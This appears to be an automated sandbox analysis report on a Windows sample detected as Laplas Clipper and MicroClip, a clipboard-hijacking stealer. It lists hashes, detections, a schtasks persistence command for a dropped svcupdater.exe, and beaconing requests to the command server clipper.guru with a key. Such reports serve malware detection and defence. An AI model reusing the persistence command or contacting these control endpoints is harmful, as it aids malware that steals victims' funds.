Windows Analysis Report
IVO2cpEukR.exe

Overview

General Information

Sample Name: IVO2cpEukR.exe
Analysis ID: 736208
MD5: 6738634d9b3bfcf7ebca8be48c091b3e
SHA1: f08091a4b3f5c167bcdfa565584bed8ed2a69f0c
SHA256: 8c77759eff69330a5c9697d05e2a0f99c6edff904bdd52a048df0461d0459b27
Tags: exeLaplasClipper
Infos:

Detection

Laplas Clipper, MicroClip
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MicroClip
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Laplas Clipper
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: IVO2cpEukR.exe ReversingLabs: Detection: 14%
Antivirus detection for URL or domain
Source: http://clipper.guru/bot/online?guid=computer Avira URL Cloud: Label: phishing
Source: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe ReversingLabs: Detection: 14%
Source: IVO2cpEukR.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.159.189.115 45.159.189.115
Source: svcupdater.exe, 00000004.00000002.522718471.000000C000186000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://clipper.guru/bot/online?guid=computer
Source: svcupdater.exe, 00000004.00000002.522749478.000000C000192000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef
Source: unknown DNS traffic detected: queries for: clipper.guru
Source: global traffic HTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: IVO2cpEukR.exe ReversingLabs: Detection: 14%
Source: C:\Users\user\Desktop\IVO2cpEukR.exe File read: C:\Users\user\Desktop\IVO2cpEukR.exe Jump to behavior
Source: IVO2cpEukR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\IVO2cpEukR.exe C:\Users\user\Desktop\IVO2cpEukR.exe
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01
Source: C:\Users\user\Desktop\IVO2cpEukR.exe File created: C:\Users\user\AppData\Roaming\ipXroBUdMG Jump to behavior
Source: classification engine Classification label: mal84.troj.spyw.winEXE@7/3@3/1
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: IVO2cpEukR.exe Static file information: File size 5021696 > 1048576
Source: IVO2cpEukR.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: IVO2cpEukR.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x269800
Source: IVO2cpEukR.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x208e00
Source: IVO2cpEukR.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
PE file contains sections with non-standard names
Source: IVO2cpEukR.exe Static PE information: section name: .symtab
Source: svcupdater.exe.0.dr Static PE information: section name: .symtab
Drops PE files
Source: C:\Users\user\Desktop\IVO2cpEukR.exe File created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: svcupdater.exe, 00000004.00000002.522992248.0000023E77048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: IVO2cpEukR.exe, 00000000.00000002.258406632.0000028D55C4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f" Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected MicroClip
Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR
Yara detected Laplas Clipper
Source: Yara match File source: Process Memory Space: IVO2cpEukR.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected MicroClip
Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 736208 Sample: IVO2cpEukR.exe Startdate: 02/11/2022 Architecture: WINDOWS Score: 84 24 clipper.guru 2->24 28 Antivirus detection for URL or domain 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected Laplas Clipper 2->32 34 Yara detected MicroClip 2->34 8 IVO2cpEukR.exe 2 2->8         started        11 svcupdater.exe 1 2->11         started        signatures3 process4 dnsIp5 22 C:\Users\user\AppData\...\svcupdater.exe, PE32+ 8->22 dropped 15 cmd.exe 1 8->15         started        26 clipper.guru 45.159.189.115, 49708, 49709, 49710 HOSTING-SOLUTIONSUS Netherlands 11->26 36 Multi AV Scanner detection for dropped file 11->36 file6 signatures7 process8 signatures9 38 Uses schtasks.exe or at.exe to add and modify task schedules 15->38 18 conhost.exe 15->18         started        20 schtasks.exe 1 15->20         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.159.189.115
 clipper.guru Netherlands
14576 HOSTING-SOLUTIONSUS false

Contacted Domains

Name IP Active
clipper.guru 45.159.189.115 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://clipper.guru/bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef false
    		unknown
    http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef false
    • Avira URL Cloud: malware
    		 unknown